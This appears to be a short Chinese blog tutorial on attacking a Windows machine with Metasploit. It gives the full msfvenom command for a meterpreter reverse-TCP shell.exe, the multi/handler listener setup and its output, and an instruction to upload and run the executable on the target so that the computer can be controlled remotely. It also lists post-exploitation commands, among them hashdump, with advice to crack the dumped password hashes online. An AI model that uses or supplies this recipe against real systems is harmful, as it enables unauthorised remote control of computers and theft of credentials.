msfvenom的shell在windows中的使用
阿新 • • 發佈:2020-06-10
msfvenom的shell在windows中的使用
msfvenom生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe
輸入命令:
msfconsole
metasploit偵聽
msf > use exploit/multi/handler #載入模組 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #設定payload payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 上面的ip #設定kali的ip lhost => 123.123.123.123 msf exploit(multi/handler) > set lport 上面的埠 #設定kali的埠 lport => 2222 msf exploit(multi/handler) > exploit #執行 [*] Started reverse TCP handler on 123.123.123.123:2222
將生成的shell上傳至windows主機中並執行
提示有返回即可控制對方電腦,如同操作linux伺服器一樣
kill 後面跟shell端的程序id,如果加-s會結束該會話的程序
ifconfig和ipconfig 看ip
sysinfo 看系統資訊
ps 看程序(能看到shell.exe程序)
hashdump 可以dump出賬號口令的hash欄位,拿去cmd5解,這裡是為空
參考: